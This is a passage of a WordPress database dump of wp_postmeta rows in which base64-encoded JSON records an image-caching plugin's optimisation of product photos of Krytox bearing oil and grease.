d3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNS0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3ODI5MCwiaWQiOjEwMjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTUtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTUtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTUtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzgyOTMsImlkIjoxMDI2fV0='); 
INSERT INTO `wp_postmeta` VALUES (29834, 1025, 'wpfc_optimisation_reduction', '2786027'); 
INSERT INTO `wp_postmeta` VALUES (29835, 1025, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS00LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS00LmpwZyIsIndpZHRoIjozMTQ5LCJoZWlnaHQiOjIwMDAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTQuanBnIiwicmVkdWN0aW9uIjoyNzg2MDEzLCJ0aW1lIjoxNDgzNTc4MzA2LCJpZCI6IjEwMjUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3ODMwOCwiaWQiOjEwMjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS00LTgwMHg1MDguanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MDgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS00LTgwMHg1MDguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS00LTgwMHg1MDguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4MzEyLCJpZCI6MTAyNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTQtNzY4eDQ4OC5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjQ4OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTQtNzY4eDQ4OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTQtNzY4eDQ4OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzgzMTUsImlkIjoxMDI1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNC0xNjAweDEwMTYuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTAxNiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTQtMTYwMHgxMDE2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNC0xNjAweDEwMTYuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4MzE5LCJpZCI6MTAyNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTQtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzgzMjEsImlkIjoxMDI1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3ODMyNCwiaWQiOjEwMjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS00LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS00LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS00LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4MzI2LCJpZCI6MTAyNX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTQtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTQtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzgzMzAsImlkIjoxMDI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS00LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS00LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS00LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4MzMyLCJpZCI6MTAyNX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNC0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3ODMzNSwiaWQiOjEwMjV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTQtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTQtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTQtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzgzMzcsImlkIjoxMDI1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS00LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS00LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS00LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc4MzM5LCJpZCI6MTAyNX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtNC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3ODM0MiwiaWQiOjEwMjV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTQtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTQtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTQtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzgzNDUsImlkIjoxMDI1fV0='); 
INSERT INTO `wp_postmeta` VALUES (29836, 1024, 'wpfc_optimisation_reduction', '13135'); 
INSERT INTO `wp_postmeta` VALUES (29837, 1024, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0zLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0zLmpwZyIsIndpZHRoIjo1NjU3LCJoZWlnaHQiOjM3NzEsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NzgzNTAsImlkIjoiMTAyNCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0zLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0zLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0zLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo1NzksInRpbWUiOjE0ODM1NzgzNTMsImlkIjoxMDI0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTEyNywidGltZSI6MTQ4MzU3ODM1NywiaWQiOjEwMjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0zLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0zLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0zLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxMDE1LCJ0aW1lIjoxNDgzNTc4MzYwLCJpZCI6MTAyNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTMtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0zLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTMtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6NTMwMCwidGltZSI6MTQ4MzU3ODM2NSwiaWQiOjEwMjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0zLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0zLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwva3J5dG94LWJlYXJpbmctb2lsLWdyZWFzZS0zLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo0OTksInRpbWUiOjE0ODM1NzgzNjgsImlkIjoxMDI0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2tyeXRveC1iZWFyaW5nLW9pbC1ncmVhc2UtMy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDEwLCJ0aW1lIjoxNDgzNTc4MzcyLCJpZCI6MTAyNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTMtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTMtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9rcnl0b3gtYmVhcmluZy1vaWwtZ3JlYXNlLTMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ0MiwidGltZSI6MTQ4MzU3ODM3NSwiaWQiOjEwMjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8